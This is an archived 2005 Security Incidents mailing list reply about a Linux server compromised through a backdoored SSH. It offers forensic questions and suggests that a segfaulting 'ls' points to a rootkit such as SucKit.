Security Incidents mailing list archives
Re: SSH compiled with backdoor
From: Peter Kosinar <goober () ksp sk>
Date: Thu, 1 Sep 2005 02:24:27 +0200 (CEST)
This mail has been originally sent to the original poster's address but (what a surprise :-) ) it bounced because of the phony address he used. Therefore, I'm sending it here...
Hello Steve!
According to john, a couple of users had weak passwords, but root seemed well protected. From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there.
Hmm... did you perform some kind of post-mortem analysis of the system? For example, did you find the john.pot file, where JTR stores the cracked passwords? Did the /lib/java directory contain any interesting data? Did you find the way the attacker used to obtain root (assuming that the password wasn't cracked)?
I found this about a month later when I logged into the box, did an ls, only to be met by a seg fault. A ps x showed mech.tgz trying to be
'ls' causing segfault is a common symptom of installed rootkit. Did you look for some other misbehaving programs? In fact, as you are running a 2.4 series kernel, it might be a kernel-level rootkit called SucKit, which is, according to my experience, quite popular among .ro badguys.
Peter Kosinar -- [Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278
Current thread:
- Re: SSH compiled with backdoor Peter Kosinar (Sep 01)
- Incident legal plan?? Jason Burton (Sep 02)
- RE: Incident legal plan?? dave kleiman (Sep 03)
- RE: Incident legal plan?? Michele Jordan (Sep 07)
- <Possible follow-ups>
- Re: SSH compiled with backdoor [no-spam-plz] (Sep 02)
- RE: SSH compiled with backdoor Chain, David (NA ITRC Team Lead) (Sep 02)
- Incident legal plan?? Jason Burton (Sep 02)